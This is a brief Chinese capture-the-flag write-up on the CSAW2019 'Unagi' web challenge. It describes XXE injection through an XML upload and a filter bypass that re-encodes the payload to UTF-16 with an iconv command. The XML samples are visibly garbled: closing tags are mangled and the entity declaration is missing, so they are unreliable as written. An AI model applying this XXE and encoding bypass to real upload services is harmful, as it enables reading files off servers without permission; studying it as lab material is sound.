[Web_Unagi]xxe注入过滤绕过

[Web_Unagi]xxe注入过滤绕过

提示我们需要上传文件，并且flag在根目录下，

上传文件的格式为：

<users>
    <user>
        <username>aliceusername>
        <password>passwd1password>
        <name>Alicename>
        <email>[email protected]email>
        <group>CSAW2019group>
    user>
    <user>
        <username>bobusername>
        <password>passwd2password>
        <name> Bobname>
        <email>[email protected]email>
        <group>CSAW2019group>
    user>
users>

很明显使用xxe注入

DOCTYPE users [
]>
<users>
    <user>
        <username>ggusername>
        <password>passwd1password>
        <name>gggname>
        <email>[email protected]email>  
        <group>CSAW2019group>
        <intro>&xxe;intro>
    user>
users>

但是上传上去发现被过滤了，我们需要想办法绕过

由于xml文件支持UTF-16编码，所以我们可以把文件转为UTF-16

iconv -f UTF-8 -t UTF-16 1.xml > flag.xml

然后再上传：